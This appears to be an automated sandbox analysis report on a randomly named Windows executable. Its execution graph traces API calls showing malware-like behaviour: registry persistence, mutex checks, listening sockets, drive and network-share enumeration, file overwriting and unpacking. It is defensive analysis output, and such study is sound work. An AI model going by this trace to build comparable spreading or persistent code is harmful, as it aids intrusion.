                                                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe"
                                                                                                                                                                                                                                                                                          Imagebase:0xa90000
                                                                                                                                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          Target ID:46
                                                                                                                                                                                                                                                                                          Start time:06:45:19
                                                                                                                                                                                                                                                                                          Start date:18/10/2024
                                                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe"
                                                                                                                                                                                                                                                                                          Imagebase:0xa90000
                                                                                                                                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                          Disassembly

                                                                                                                                                                                                                                                                                          Reset < >

                                                                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                                                                            Execution Coverage:22.4%
                                                                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                                            Signature Coverage:18.3%
                                                                                                                                                                                                                                                                                            Total number of Nodes:1902
                                                                                                                                                                                                                                                                                            Total number of Limit Nodes:56
                                                                                                                                                                                                                                                                                            execution_graph 9106 1438dc4 9107 1438dce RtlExitUserThread 9106->9107 9108 1437fca 9111 1437fd3 9108->9111 9109 14380e4 9110 14380e6 recv 9110->9109 9111->9109 9111->9110 9112 143809c select 9111->9112 9112->9109 9112->9110 9113 143b3c9 9114 143b3d3 9113->9114 9115 143b3db 9113->9115 9116 1434503 InterlockedExchange 9115->9116 9116->9114 9117 1438ec9 9118 1438ee2 9117->9118 9119 1438f47 9118->9119 9120 1438f2f lstrcpyn 9118->9120 9120->9119 9121 14408ce 9122 14408d8 9121->9122 9123 14408de GlobalFree 9122->9123 9124 14408ef RtlLeaveCriticalSection 9122->9124 9123->9124 9125 1440915 9124->9125 9126 144090a Sleep 9124->9126 9126->9125 8997 14bd440 8998 14bd760 8997->8998 9000 14bd765 8998->9000 9001 14bd78b LoadLibraryExA 9000->9001 9009 14bd778 9000->9009 9003 14bd9c0 7 API calls 9001->9003 9004 14bd83c 9003->9004 9028 14bd9c5 9004->9028 9007 14bd7cf GetModuleFileNameA 9011 14bd93f LoadLibraryExA GetProcAddress 9007->9011 9012 14bd9a0 Sleep 9007->9012 9008 14bd896 MapViewOfFile 9008->9007 9009->9007 9019 14bd9c0 9009->9019 9011->9012 9013 14bd96c CreateMutexA GetLastError 9011->9013 9014 14bd9ab ExitProcess 9012->9014 9013->9012 9013->9014 9016 14bd803 9018 14bd9c0 7 API calls 9016->9018 9018->9001 9020 14bd91a GetModuleFileNameA 9019->9020 9021 14bd9c4 9019->9021 9023 14bd93f LoadLibraryExA GetProcAddress 9020->9023 9024 14bd9a0 Sleep 9020->9024 9021->9016 9023->9024 9025 14bd96c CreateMutexA GetLastError 9023->9025 9026 14bd9ab ExitProcess 9024->9026 9025->9024 9025->9026 9029 14bd9c9 9028->9029 9029->9028 9029->9029 9030 14bd9cc GetProcAddress 9029->9030 9032 14bd853 SetErrorMode CreateFileMappingA CreateFileMappingA 9029->9032 9031 14bd9c0 7 API calls 9030->9031 9031->9029 9032->9007 9032->9008 8988 14c7ac0 8989 14c7ad8 8988->8989 8990 14c7bf2 LoadLibraryA 8989->8990 8994 14c7c37 VirtualProtect VirtualProtect 8989->8994 8991 14c7c09 8990->8991 8991->8989 8993 14c7c1b GetProcAddress 8991->8993 8993->8991 8996 14c7c31 ExitProcess 8993->8996 8995 14c7c9c 8994->8995 8995->8995 9296 1442c88 9297 1442c97 9296->9297 9298 1442e04 9297->9298 9299 1442ca4 9297->9299 9327 14344cb InterlockedExchange 9298->9327 9323 14344cb InterlockedExchange 9299->9323 9302 1442e09 9303 1442e24 9302->9303 9304 1442a35 10 API calls 9302->9304 9304->9303 9305 1442dff 9306 1442ca9 9306->9305 9324 14344cb InterlockedExchange 9306->9324 9308 1442cf4 9309 1442d12 lstrcpy 9308->9309 9310 1442a35 10 API calls 9308->9310 9311 1442962 InterlockedExchange 9309->9311 9312 1442d0f 9310->9312 9313 1442d44 9311->9313 9312->9309 9314 1442dee lstrcat 9313->9314 9325 14344cb InterlockedExchange 9313->9325 9314->9305 9316 1442d68 9317 1442d8c lstrcat 9316->9317 9318 1442d7a lstrcat 9316->9318 9326 14344cb InterlockedExchange 9317->9326 9318->9317 9320 1442da3 9321 1442db5 lstrcat 9320->9321 9322 1442dc7 lstrlen wsprintfA 9320->9322 9321->9322 9322->9314 9323->9306 9324->9308 9325->9316 9326->9320 9327->9302 9127 143f8d6 9128 143f8e5 9127->9128 9129 143f925 9128->9129 9130 143cd03 2 API calls 9128->9130 9131 143f9a1 9129->9131 9134 143cd03 2 API calls 9129->9134 9130->9129 9132 143f9f8 9131->9132 9135 143cd03 2 API calls 9131->9135 9186 14344cb InterlockedExchange 9132->9186 9134->9131 9135->9132 9136 143fa0e 9137 143fa55 9136->9137 9187 14344cb InterlockedExchange 9136->9187 9188 14344cb InterlockedExchange 9137->9188 9140 143fa82 9141 143cd03 2 API calls 9140->9141 9142 143fad5 9140->9142 9141->9142 9143 143cd03 2 API calls 9142->9143 9144 143fb50 9142->9144 9143->9144 9145 143c76b 2 API calls 9144->9145 9147 143fb9e 9144->9147 9145->9147 9146 143fc7e 9189 14344cb InterlockedExchange 9146->9189 9147->9146 9149 143cd03 2 API calls 9147->9149 9149->9146 9150 143fd1f 9153 143b3ef InterlockedExchange 9150->9153 9151 143fc94 9151->9150 9152 143fd5c 9151->9152 9155 143cd03 2 API calls 9151->9155 9154 143d34d 2 API calls 9152->9154 9158 143fdea 9152->9158 9153->9152 9157 143fe63 9154->9157 9155->9150 9156 14407db CloseHandle 9159 14407f5 SetFilePointer SetEndOfFile 9156->9159 9160 144088b CloseHandle SetFileAttributesA 9156->9160 9157->9158 9165 143c89a 2 API calls 9157->9165 9158->9156 9170 14407d1 UnmapViewOfFile 9158->9170 9171 1440793 GlobalAlloc 9158->9171 9172 14405ed 9158->9172 9161 1440852 9159->9161 9162 144082b 9159->9162 9163 14408b5 DeleteFileA 9160->9163 9164 14408af 9160->9164 9167 1440858 GlobalFree 9161->9167 9168 1440869 SetFileTime 9161->9168 9162->9161 9166 1440831 WriteFile 9162->9166 9169 14408bf 9163->9169 9164->9163 9164->9169 9177 143fe88 9165->9177 9166->9161 9167->9168 9168->9160 9173 14408de GlobalFree 9169->9173 9174 14408ef RtlLeaveCriticalSection 9169->9174 9170->9156 9171->9172 9172->9170 9173->9174 9175 1440915 9174->9175 9176 144090a Sleep 9174->9176 9176->9175 9177->9158 9178 1436981 InterlockedExchange 9177->9178 9179 14403c7 9178->9179 9190 14344cb InterlockedExchange 9179->9190 9181 14404ed GetTickCount 9181->9158 9182 144051a 9181->9182 9191 14344cb InterlockedExchange 9182->9191 9184 144051f 9184->9158 9192 14344cb InterlockedExchange 9184->9192 9186->9136 9187->9136 9188->9140 9189->9151 9190->9181 9191->9184 9192->9184 9193 14433df 9197 144333d 9193->9197 9194 1443515 CloseHandle 9195 1443522 GetFileAttributesA 9194->9195 9198 144353e SetFileAttributesA DeleteFileA 9195->9198 9199 1443569 CreateFileA 9195->9199 9196 1443465 lstrcpy GetFileAttributesA 9196->9197 9201 1443491 CloseHandle CreateFileA 9196->9201 9197->9194 9197->9196 9221 1443372 ReadFile CharLowerA lstrlen 9197->9221 9222 143a2ad SHFileOperation RemoveDirectoryA 9198->9222 9200 1443598 GetSystemTime SystemTimeToFileTime 9199->9200 9209 14431f9 9199->9209 9203 143a16b 2 API calls 9200->9203 9201->9197 9204 14434c9 WriteFile CloseHandle SetFileAttributesA 9201->9204 9205 1443605 9203->9205 9204->9197 9211 1443633 lstrcat 9205->9211 9212 144361f lstrcat 9205->9212 9215 1442b8e 18 API calls 9205->9215 9223 14344cb InterlockedExchange 9205->9223 9206 1443734 Sleep 9206->9209 9208 1443744 RtlExitUserThread 9209->9199 9209->9206 9209->9208 9213 1442ebc 11 API calls 9209->9213 9218 1443278 GetDriveTypeA 9209->9218 9211->9205 9212->9205 9214 144320b Sleep GetLogicalDrives 9213->9214 9214->9209 9216 1443658 6 API calls 9215->9216 9216->9209 9217 14436ef WriteFile CloseHandle SetFileAttributesA 9216->9217 9217->9209 9218->9209 9219 14432bc lstrcat CreateFileA 9218->9219 9219->9195 9220 14432ff GetFileTime FileTimeToSystemTime 9219->9220 9220->9194 9220->9197 9221->9197 9222->9209 9223->9205 9224 143b1df 9225 143b366 9224->9225 9233 14344cb InterlockedExchange 9224->9233 9234 14344cb InterlockedExchange 9225->9234 9228 143b37b 9229 143b38d GetTickCount 9228->9229 9230 143b39c 9228->9230 9229->9230 9231 143c76b 2 API calls 9230->9231 9232 143b3b7 9231->9232 9233->9225 9234->9228 9043 143511e 9044 143512d 9043->9044 9045 143513a wsprintfA 9044->9045 9051 143529e 9044->9051 9046 14351a0 RegQueryValueExA 9045->9046 9047 1435165 RegQueryValueExA 9045->9047 9050 1435199 9046->9050 9047->9050 9048 1435433 RegCloseKey 9049 1435440 9048->9049 9052 1436330 32 API calls 9051->9052 9053 1435403 9051->9053 9052->9053 9053->9048 9053->9049 7180 1444567 SetErrorMode WSAStartup RtlInitializeCriticalSection RtlInitializeCriticalSection RtlInitializeCriticalSection 7203 1443b60 7180->7203 7184 14445de CreateThread 7185 14341c6 3 API calls 7184->7185 7552 1439eea 7184->7552 7186 1444605 CreateThread 7185->7186 7187 14341c6 3 API calls 7186->7187 7526 144392d 7186->7526 7188 144462c CreateThread 7187->7188 7189 14341c6 3 API calls 7188->7189 7507 1438962 Sleep 7188->7507 7190 1444653 CreateThread 7189->7190 7191 14341c6 3 API calls 7190->7191 7488 143a2f5 7190->7488 7192 144467a CreateThread 7191->7192 7193 14341c6 3 API calls 7192->7193 7482 143426a 7192->7482 7194 14446a1 CreateThread 7193->7194 7195 14341c6 3 API calls 7194->7195 7468 1437a3a 7194->7468 7196 14446c8 CreateThread 7195->7196 7197 14341c6 3 API calls 7196->7197 7456 14383c9 socket 7196->7456 7198 14446ef CreateThread 7197->7198 7199 14341c6 3 API calls 7198->7199 7434 143878b Sleep 7198->7434 7200 1444716 7199->7200 7201 1444722 Sleep 7200->7201 7202 144472f 7200->7202 7201->7200 7204 1443b8a 7203->7204 7278 1442ebc RegOpenKeyExA 7204->7278 7207 1443c72 LoadLibraryA 7209 1443cf1 RegOpenKeyExA 7207->7209 7210 1443c8e GetProcAddress GetProcAddress GetProcAddress GetProcAddress 7207->7210 7208 1443c28 GetProcAddress GetProcAddress GetProcAddress 7208->7207 7211 1443d15 RegSetValueExA RegCloseKey 7209->7211 7212 1443d4d RegOpenKeyExA 7209->7212 7210->7209 7211->7212 7213 1443d71 RegSetValueExA RegCloseKey 7212->7213 7214 1443da9 lstrcpy lstrcat RegOpenKeyExA 7212->7214 7213->7214 7215 1443df4 GetModuleFileNameA wsprintfA lstrlen RegSetValueExA RegCloseKey 7214->7215 7216 1443e5f RegOpenKeyExA 7214->7216 7215->7216 7217 1443f15 GetWindowsDirectoryA lstrlen 7216->7217 7218 1443e87 RegSetValueExA RegSetValueExA RegSetValueExA RegCloseKey 7216->7218 7219 1443f4c GetComputerNameA lstrlen 7217->7219 7220 1443f3c lstrcat 7217->7220 7218->7217 7221 1443f7c lstrlen 7219->7221 7222 1443fc9 lstrcpy GetUserNameA lstrlen 7219->7222 7220->7219 7221->7222 7223 1444009 lstrcpy 7222->7223 7226 144401d 7222->7226 7223->7226 7224 144404e lstrlen 7225 14440e1 7224->7225 7224->7226 7286 1440b9a lstrcpy GetTickCount lstrlen wsprintfA CreateFileA 7225->7286 7226->7224 7226->7225 7228 14440aa lstrlen 7226->7228 7228->7226 7230 14440f2 GetTempPathA lstrlen 7232 1444129 7230->7232 7233 1444119 lstrcat 7230->7233 7231 144414d lstrcpy 7239 144414b 7231->7239 7235 1440b9a 7 API calls 7232->7235 7233->7232 7234 1444178 lstrlen 7236 1444205 lstrcat CreateFileMappingA 7234->7236 7234->7239 7237 1444133 7235->7237 7240 144423a 7236->7240 7238 144413a lstrcpy 7237->7238 7237->7239 7238->7239 7239->7234 7239->7236 7241 14441db lstrlen 7239->7241 7289 1436274 CreateFileMappingA 7240->7289 7241->7239 7245 1444246 7246 1444256 7245->7246 7247 1444331 7245->7247 7309 143c89a 7246->7309 7248 1435760 10 API calls 7247->7248 7252 144432c 7248->7252 7250 144431e 7251 1435760 10 API calls 7250->7251 7251->7252 7315 1434d96 7252->7315 7253 144428e 7253->7250 7259 144429d 7253->7259 7255 144434a 7349 14355be CreateFileA 7255->7349 7259->7253 7366 1435e86 7259->7366 7260 1444366 7263 1444397 7260->7263 7267 14443c6 7260->7267 7261 1444361 7360 143a553 GetTickCount GetPrivateProfileStringA lstrlen 7261->7360 7372 14344cb InterlockedExchange 7263->7372 7265 144439c GetTickCount wsprintfA 7265->7267 7266 14444aa lstrcat GetSystemDirectoryA lstrlen 7268 14444f5 lstrcat lstrcat GlobalAlloc GlobalAlloc 7266->7268 7269 14444e5 lstrcat 7266->7269 7267->7266 7271 1444461 lstrlen wsprintfA 7267->7271 7270 1444556 CreateThread 7268->7270 7269->7268 7273 14341c6 RtlEnterCriticalSection 7270->7273 7447 14427d4 GlobalAlloc 7270->7447 7271->7267 7272 14444a3 7271->7272 7272->7266 7274 1434229 7273->7274 7277 14341e2 7273->7277 7275 143425b RtlLeaveCriticalSection 7274->7275 7276 143423c CloseHandle 7274->7276 7275->7184 7276->7275 7277->7275 7279 1442f44 7278->7279 7280 1442f0d RegSetValueExA RegCloseKey 7278->7280 7281 1442f8b lstrcpy lstrcat 7279->7281 7373 1442e32 RegOpenKeyExA 7279->7373 7280->7279 7285 1442fbe 7281->7285 7283 1442ffa LoadLibraryA 7283->7207 7283->7208 7284 1442e32 6 API calls 7284->7285 7285->7283 7285->7284 7287 1440c44 7286->7287 7288 1440c23 CloseHandle DeleteFileA 7286->7288 7287->7230 7287->7231 7288->7287 7290 14362d9 7289->7290 7291 14362bc MapViewOfFile 7289->7291 7292 1435760 7290->7292 7291->7290 7293 14357e3 7292->7293 7294 14357ec 7292->7294 7293->7294 7295 14357f1 lstrcpy RegOpenKeyExA 7293->7295 7294->7245 7296 1435827 7295->7296 7297 1435854 7295->7297 7296->7294 7298 1435832 RegCreateKeyA 7296->7298 7299 143585e 7297->7299 7303 1435a4b 7297->7303 7298->7294 7298->7297 7300 1435872 RegEnumValueA 7299->7300 7301 14358ad RegDeleteValueA 7299->7301 7308 14358ab 7299->7308 7300->7299 7300->7308 7301->7300 7302 1435bf4 RegCloseKey 7302->7294 7304 1435ad0 wsprintfA RegQueryValueExA 7303->7304 7305 1435935 7303->7305 7304->7305 7305->7294 7305->7302 7306 1435962 wsprintfA 7307 1435a01 RegSetValueExA 7306->7307 7306->7308 7307->7308 7308->7305 7308->7306 7308->7307 7310 143c8b7 7309->7310 7311 143c906 7309->7311 7310->7311 7312 143c8c0 MapViewOfFile 7310->7312 7311->7253 7312->7311 7313 143c8e0 7312->7313 7314 143c8f2 UnmapViewOfFile 7313->7314 7314->7311 7316 1434dc0 7315->7316 7317 1434e41 lstrcpy lstrlen wsprintfA RegOpenKeyExA 7316->7317 7318 1434e3c 7316->7318 7319 1435112 7317->7319 7320 1434eb7 RegCreateKeyA 7317->7320 7318->7255 7323 143513a wsprintfA 7319->7323 7346 143529e 7319->7346 7320->7318 7321 1434ee0 GlobalAlloc 7320->7321 7322 143c89a 2 API calls 7321->7322 7324 1434eff 7322->7324 7325 14351a0 RegQueryValueExA 7323->7325 7326 1435165 RegQueryValueExA 7323->7326 7327 1434f1a 7324->7327 7378 1436330 7324->7378 7333 1435199 7325->7333 7326->7333 7331 1434f52 wsprintfA 7327->7331 7332 1435085 RegCloseKey 7327->7332 7336 14350d2 7327->7336 7328 1435433 RegCloseKey 7328->7318 7330 14350f9 GlobalFree 7330->7318 7334 1434fa9 7331->7334 7335 1434f9c 7331->7335 7332->7336 7333->7255 7339 1435053 lstrlen RegSetValueExA 7334->7339 7340 1435030 RegSetValueExA 7334->7340 7335->7333 7335->7334 7337 1435007 7335->7337 7338 1434fe5 7335->7338 7336->7318 7336->7330 7341 1434a5b 2 API calls 7337->7341 7402 1434a5b 7338->7402 7342 1435080 7339->7342 7340->7342 7345 1435016 lstrcpy 7341->7345 7342->7255 7345->7334 7347 1436330 32 API calls 7346->7347 7348 1435403 7346->7348 7347->7348 7348->7318 7348->7328 7350 1435650 GetFileSize 7349->7350 7351 143572b 7349->7351 7352 1435672 7350->7352 7353 143571e CloseHandle 7350->7353 7355 1436330 32 API calls 7351->7355 7358 1435742 7351->7358 7352->7353 7354 1435682 GlobalAlloc ReadFile lstrcpy lstrlen 7352->7354 7353->7351 7359 14356f4 7354->7359 7355->7358 7356 143575b lstrlen 7356->7260 7356->7261 7357 143574e GlobalFree 7357->7356 7358->7356 7358->7357 7359->7353 7361 143a660 lstrcpy 7360->7361 7362 143a5e0 GetTickCount 7360->7362 7361->7260 7363 143a5ff 7362->7363 7433 14344cb InterlockedExchange 7363->7433 7365 143a613 wsprintfA WritePrivateProfileStringA 7365->7361 7367 1435eb2 7366->7367 7368 1435ebb 7366->7368 7367->7368 7369 1435f2b GetTickCount 7367->7369 7370 1435f0f 7367->7370 7368->7259 7369->7370 7370->7368 7371 1436056 GetTickCount 7370->7371 7371->7368 7372->7265 7374 1442e80 RegCreateKeyA 7373->7374 7375 1442e5c RegSetValueExA RegCloseKey 7373->7375 7376 1442eb8 7374->7376 7377 1442e96 RegSetValueExA RegCloseKey 7374->7377 7375->7376 7376->7279 7377->7376 7406 1448060 7378->7406 7381 143672a 7382 1436734 IsBadWritePtr 7381->7382 7383 143695b RtlLeaveCriticalSection 7381->7383 7382->7383 7385 143674f 7382->7385 7384 143697c 7383->7384 7384->7327 7385->7383 7386 143678e wsprintfA lstrlen 7385->7386 7387 14367ca 7386->7387 7387->7383 7388 1436875 GlobalAlloc 7387->7388 7389 1436868 GlobalFree 7387->7389 7390 14368a7 7388->7390 7389->7388 7391 14368b3 GlobalFree 7390->7391 7392 14368bf GlobalAlloc wsprintfA lstrlen 7390->7392 7391->7392 7394 1436914 7392->7394 7393 1436412 7428 14354a2 CreateFileA 7394->7428 7395 1436623 lstrcpy 7396 14363dd 7395->7396 7396->7393 7396->7395 7397 1436698 7396->7397 7401 14366a1 7397->7401 7408 1434af0 7397->7408 7401->7383 7403 1434a68 7402->7403 7404 1434ab2 lstrlen wsprintfA 7403->7404 7405 1434ae5 lstrcpy 7403->7405 7404->7403 7405->7334 7407 143633d RtlEnterCriticalSection 7406->7407 7407->7381 7407->7396 7409 1434afd 7408->7409 7410 1434b60 lstrcpy lstrlen wsprintfA RegOpenKeyExA 7409->7410 7411 1434b5b 7409->7411 7412 1434bcb RegCreateKeyA 7410->7412 7413 1434bed 7410->7413 7411->7401 7412->7413 7414 1434be8 7412->7414 7415 1434c15 wsprintfA 7413->7415 7416 1434d68 RegCloseKey 7413->7416 7414->7411 7417 1434c60 7415->7417 7418 1434c6d 7415->7418 7416->7411 7417->7418 7421 1434ce5 7417->7421 7422 1434cbc 7417->7422 7419 1434d13 RegSetValueExA 7418->7419 7420 1434d36 lstrlen RegSetValueExA 7418->7420 7424 1434d63 7419->7424 7420->7424 7425 1434a5b 2 API calls 7421->7425 7423 1434a5b 2 API calls 7422->7423 7426 1434cd2 lstrcpy 7423->7426 7424->7401 7427 1434cf9 lstrcpy 7425->7427 7426->7418 7427->7418 7429 1435520 lstrcpy lstrlen 7428->7429 7430 14355b9 7428->7430 7431 1435561 7429->7431 7430->7383 7432 143557b WriteFile SetEndOfFile CloseHandle 7431->7432 7432->7430 7433->7365 7436 14387d7 7434->7436 7435 14388e2 RtlExitUserThread 7436->7435 7437 143889a Sleep 7436->7437 7438 143883d 7436->7438 7439 14388b8 Sleep 7436->7439 7441 143883f CreateThread 7436->7441 7446 143887f Sleep 7436->7446 7437->7436 7438->7436 7438->7439 7440 1435760 10 API calls 7439->7440 7442 14388ca 7440->7442 7443 14341c6 3 API calls 7441->7443 7597 14384c1 7441->7597 7445 14388d2 Sleep 7442->7445 7444 1438868 Sleep 7443->7444 7444->7436 7445->7436 7446->7436 7448 143c89a 2 API calls 7447->7448 7450 1442828 7448->7450 7449 1442845 GlobalFree 7452 1442885 RtlExitUserThread 7449->7452 7453 1442863 7449->7453 7450->7449 7453->7452 7738 1442514 CreateToolhelp32Snapshot 7453->7738 7455 144291f Sleep 7455->7453 7457 14383f9 7456->7457 7458 14383fe htons bind 7456->7458 7461 14384a9 RtlExitUserThread 7457->7461 7462 143849f closesocket 7457->7462 7458->7457 7459 1438438 listen 7458->7459 7459->7457 7460 143844d 7459->7460 7460->7457 7463 1438456 accept 7460->7463 7465 1438473 CreateThread 7460->7465 7464 14384bb 7461->7464 7462->7461 7463->7460 7466 14341c6 3 API calls 7465->7466 7802 143828e 7465->7802 7467 1438494 7466->7467 7467->7460 7469 1448060 7468->7469 7470 1437a47 htons socket 7469->7470 7471 1437b20 setsockopt bind 7470->7471 7472 1437b1b 7470->7472 7471->7472 7479 1437b69 7471->7479 7476 1437c37 RtlExitUserThread 7472->7476 7477 1437c2a closesocket 7472->7477 7473 1437b76 GlobalAlloc recvfrom 7474 1437be6 CreateThread 7473->7474 7475 1437c0f GlobalFree 7473->7475 7478 14341c6 3 API calls 7474->7478 7805 143777d 7474->7805 7475->7479 7480 1437c47 7476->7480 7477->7476 7481 1437c0a 7478->7481 7479->7472 7479->7473 7481->7479 7484 1434275 7482->7484 7483 14342dc RtlExitUserThread 7484->7483 7485 14342cf Sleep 7484->7485 7486 14342a6 WaitForSingleObject 7484->7486 7487 14341c6 3 API calls 7484->7487 7485->7484 7486->7484 7487->7484 7838 14344cb InterlockedExchange 7488->7838 7490 143a360 Sleep GetTempPathA lstrlen 7491 143a3a6 lstrcat 7490->7491 7492 143a3b8 7490->7492 7491->7492 7493 143a542 RtlExitUserThread 7492->7493 7494 143a3c5 lstrlen lstrcpy lstrcat 7492->7494 7495 143a411 FindFirstFileA 7492->7495 7497 143a532 Sleep 7492->7497 7498 143a525 FindClose 7492->7498 7494->7492 7495->7492 7496 143a43b FindNextFileA 7495->7496 7496->7492 7499 143a457 lstrcat lstrlen lstrlen 7496->7499 7497->7492 7498->7497 7500 143a49e lstrcmpiA 7499->7500 7505 143a4ca 7499->7505 7501 143a4b9 7500->7501 7500->7505 7501->7505 7839 143a26e 7501->7839 7502 143a50c Sleep 7502->7496 7504 143a4e3 lstrcmpiA 7504->7502 7504->7505 7505->7502 7505->7504 7845 143a2ad SHFileOperation RemoveDirectoryA 7505->7845 8413 14344cb InterlockedExchange 7507->8413 7509 1438a1f Sleep 7513 1438a39 7509->7513 7510 1438db5 RtlExitUserThread 7511 1438bab Sleep 7511->7513 7513->7510 7513->7511 7514 1438da5 Sleep 7513->7514 7515 1438d8d Sleep 7513->7515 7516 1438cae lstrcpy 7513->7516 7517 1438b2a IsBadWritePtr 7513->7517 8414 143a75a GetTempPathA lstrlen 7513->8414 8424 1440945 lstrcpy 7513->8424 8441 14414d9 CreateFileA 7513->8441 7514->7513 7515->7513 7516->7513 7517->7513 7521 1438b48 7517->7521 7518 143a75a 10 API calls 7518->7521 7521->7518 8460 14345d2 DeleteFileA CreateFileA 7521->8460 8463 1434631 lstrcpy lstrlen 7521->8463 7524 1438b86 Sleep 7524->7513 7527 144393a 7526->7527 7528 1443971 Sleep 7527->7528 7529 144397e lstrcpy LoadLibraryA 7527->7529 7528->7527 7530 14439b7 GetProcAddress 7529->7530 7531 14439cf 7529->7531 7530->7531 7532 1443a2c 7531->7532 7533 14439d8 FreeLibrary lstrcat LoadLibraryA 7531->7533 8492 144377a 7532->8492 7533->7532 7534 1443a14 GetProcAddress 7533->7534 7534->7532 7536 1443a31 CreateThread 7537 14341c6 3 API calls 7536->7537 8627 1443062 7536->8627 7538 1443a55 CreateThread 7537->7538 7539 14341c6 3 API calls 7538->7539 8620 1441e9b Sleep 7538->8620 7540 1443a7c Sleep 7539->7540 7541 1443ab0 7540->7541 7542 1443ae7 Sleep 7541->7542 7543 1443ab9 CreateThread 7541->7543 7547 1443a96 Sleep 7541->7547 8503 144174a Sleep wsprintfA RegOpenKeyExA 7542->8503 7544 14341c6 3 API calls 7543->7544 8613 1441ce3 7543->8613 7544->7541 7547->7541 7548 144174a 56 API calls 7550 1443b09 7548->7550 7549 1443b0e Sleep 7549->7550 7550->7549 8512 144195d Sleep WNetOpenEnumA 7550->8512 7553 1439f06 Sleep 7552->7553 7554 1439ef9 Sleep 7552->7554 7555 1439f11 7553->7555 7554->7555 8749 1438f51 RegOpenKeyExA 7555->8749 7558 1438f51 7 API calls 7559 1439f43 LoadLibraryA 7558->7559 7560 1439f60 GetProcAddress 7559->7560 7561 143a149 RtlExitUserThread 7559->7561 7563 1439f83 GetProcAddress 7560->7563 7564 1439f7e 7560->7564 7562 143a165 7561->7562 7565 1439fa2 7563->7565 7566 1439fa7 GetProcAddress 7563->7566 7567 1439fc6 7566->7567 7568 1439fcb GetProcAddress 7566->7568 7569 1439fe9 7568->7569 7570 1439fee GetProcAddress 7568->7570 7571 143a012 GetProcAddress 7570->7571 7572 143a00d 7570->7572 7573 143a031 7571->7573 7574 143a036 GetProcAddress 7571->7574 7575 143a054 7574->7575 7576 143a059 GetProcAddress 7574->7576 7577 143a07d 7576->7577 7596 143a078 7576->7596 8760 14392f3 GetSystemDirectoryA lstrlen 7577->8760 7579 143a082 CreateThread 7580 14341c6 3 API calls 7579->7580 8794 143940a 7579->8794 7581 143a0a3 LoadLibraryA 7580->7581 7581->7561 7582 143a0c0 GetProcAddress 7581->7582 7582->7561 7583 143a0de 7582->7583 8764 143917d CreateFileA 7583->8764 7585 143a0e3 7586 143a110 7585->7586 7587 14345d2 4 API calls 7585->7587 7588 143917d 2 API calls 7586->7588 7589 143a0fd 7587->7589 7590 143a118 7588->7590 8767 1439243 7589->8767 7590->7561 8770 1439706 GetSystemDirectoryA lstrlen 7590->8770 7594 143a125 CreateThread 7595 14341c6 3 API calls 7594->7595 8789 1439ebe 7594->8789 7595->7596 7596->7561 7598 1448060 7597->7598 7599 14384ce InterlockedIncrement htons 7598->7599 7600 143857b 7599->7600 7617 143719b 7600->7617 7603 14385a2 GetTickCount 7605 14385de 7603->7605 7610 14385f5 7603->7610 7604 14386ba 7606 14386e5 InterlockedDecrement RtlExitUserThread 7604->7606 7607 143719b 38 API calls 7605->7607 7607->7610 7608 1438651 7609 1438673 7608->7609 7650 1437523 7608->7650 7613 14386b5 7609->7613 7662 1436ebe 7609->7662 7610->7608 7611 143862a 7610->7611 7632 1437f11 htons 7610->7632 7611->7608 7638 14382b6 htons 7611->7638 7613->7606 7618 1448060 7617->7618 7619 14371a8 socket 7618->7619 7620 143721c 7619->7620 7630 143734f 7619->7630 7677 1436981 7620->7677 7621 1437513 7621->7603 7621->7604 7622 1437506 closesocket 7622->7621 7624 143723a 7625 1437250 sendto 7624->7625 7624->7630 7626 143727c select 7625->7626 7625->7630 7628 1437354 recvfrom 7626->7628 7626->7630 7629 143738d 7628->7629 7628->7630 7629->7630 7631 1436330 32 API calls 7629->7631 7630->7621 7630->7622 7631->7630 7633 1437f5f 7632->7633 7701 1437c4e socket 7633->7701 7636 1437f9b closesocket 7636->7611 7637 1437f7c send 7637->7636 7639 1438336 7638->7639 7717 14344cb InterlockedExchange 7639->7717 7641 143833e GetTickCount 7642 1437c4e 10 API calls 7641->7642 7643 1438368 7642->7643 7644 14383a2 7643->7644 7645 143837a send 7643->7645 7647 14383c4 7644->7647 7649 14383b7 closesocket 7644->7649 7645->7644 7646 1438394 7645->7646 7718 143811c 7646->7718 7647->7608 7649->7647 7651 1448060 7650->7651 7652 1437530 socket 7651->7652 7653 1436981 InterlockedExchange 7652->7653 7654 143759e 7653->7654 7655 14375b4 sendto 7654->7655 7656 14376b3 7654->7656 7655->7656 7659 14375e0 select 7655->7659 7657 1437761 closesocket 7656->7657 7658 143776e 7656->7658 7657->7658 7658->7609 7659->7656 7661 14376b8 recvfrom 7659->7661 7661->7656 7663 1448060 7662->7663 7664 1436ecb socket 7663->7664 7665 143705c 7664->7665 7666 1436f35 7664->7666 7668 143718b 7665->7668 7669 143717e closesocket 7665->7669 7667 1436981 InterlockedExchange 7666->7667 7670 1436f47 7667->7670 7668->7613 7669->7668 7670->7665 7671 1436f5d sendto 7670->7671 